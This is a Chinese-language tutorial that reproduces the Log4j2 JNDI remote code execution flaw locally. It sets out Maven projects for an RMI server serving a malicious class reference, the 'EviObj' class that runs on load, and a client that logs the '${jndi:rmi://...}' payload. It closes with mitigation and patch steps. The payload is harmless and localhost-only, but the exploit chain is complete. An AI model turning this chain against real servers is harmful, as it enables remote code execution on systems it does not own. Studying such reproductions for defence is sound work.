log4j2远程代码执行漏洞复现

log4j2远程代码执行漏洞复现

目录

描述：

代码复现：

执行结果：

漏洞解决方案：

---

描述：

       本次 Apache Log4j 远程代码执行漏洞，正是由于组件存在 Java JNDI 注入漏洞：当程序将用户输入的数据记入日志时，攻击者通过构造特殊请求，来触发 Apache Log4j2 中的远程代码执行漏洞，从而利用此漏洞在目标服务器上执行任意代码。

代码复现：

JDK： jdk1.8.0_191

开发工具：ideaIU-2018.3.6.win

远程代码下载服务器：nginx-1.20.0

项目结构

 rmi-server:

    
        rmi
        lb
        1.0-SNAPSHOT
    
    4.0.0

    rmi-client

    rmi-client
    
    http://www.example.com

    
        UTF-8
        1.8
        1.8
    

    
        
            junit
            junit
            4.11
            test
        
        
            org.apache.logging.log4j
            log4j-api
            2.14.0
        
        
            org.apache.logging.log4j
            log4j-core
            2.14.0
        
    

package com.lb.rmi.server;

import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RmiServer
{
   public static void main( String[] args ) throws Exception
    {
      String url = "http://127.0.0.1/";
      Registry createRegistry = LocateRegistry.createRegistry(10086);
      Reference r = new Reference("EviObj","com.lb.rmi.common.EviObj",url);
      System.out.println("start rmi server");
      com.sun.jndi.rmi.registry.ReferenceWrapper rw = new com.sun.jndi.rmi.registry.ReferenceWrapper(r);
      createRegistry.bind("evil", rw);
    }
}

rmi-common:

    
        rmi
        lb
        1.0-SNAPSHOT
    
    4.0.0

    rmi-common

    rmi-common
    
    http://www.example.com

    
        UTF-8
        1.8
        1.8
    

    
        
            junit
            junit
            4.11
            test
        
    

package com.lb.rmi.common;

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;

public class EviObj implements ObjectFactory {

	static {
		System.out.println("侵入代码执行");
	}

	@Override
	public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {
		return null;
	}
}

rmi-client:

    
        rmi
        lb
        1.0-SNAPSHOT
    
    4.0.0

    rmi-client

    rmi-client
    
    http://www.example.com

    
        UTF-8
        1.8
        1.8
    

    
        
            junit
            junit
            4.11
            test
        
        
            org.apache.logging.log4j
            log4j-api
            2.14.0
        
        
            org.apache.logging.log4j
            log4j-core
            2.14.0
        
    

package com.lb.rmi.client;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class RmiClient
{
	private static final Logger log = LogManager.getLogger();
	
    public static void main( String[] args ) throws Exception
    {
		//-Dcom.sun.jndi.rmi.object.trustURLCodebase=true -Dcom.sun.jndi.ldap.object.trustURLCodebase=true
		System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
		System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");
    	String info = "${jndi:rmi://localhost:10086/evil}";
       log.info(">>，{}",info);

    }
}

 远程代码下载服务器：把rmi-common侵入代码编译后拷贝到nginx资源目录下

能访问下载即可

 

执行结果：

漏洞解决方案：

1、临时缓解方案

• 在jvm参数中添加 -Dlog4j2.FORMATMsgNoLookups=true
• 系统环境变量中将FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true
• 创建 "log4j2.component.properties" 文件，文件中增加配置 "log4j2.formatMsgNoLookups=true"

2、彻底修复方案

• 手动删除log4j-core-*.jar中org/apache/logging/log4j/core/lookup/JndiLookup.class，重启服务即可。
• 升级到官方提供的 log4j-2.15.0-rc2 版本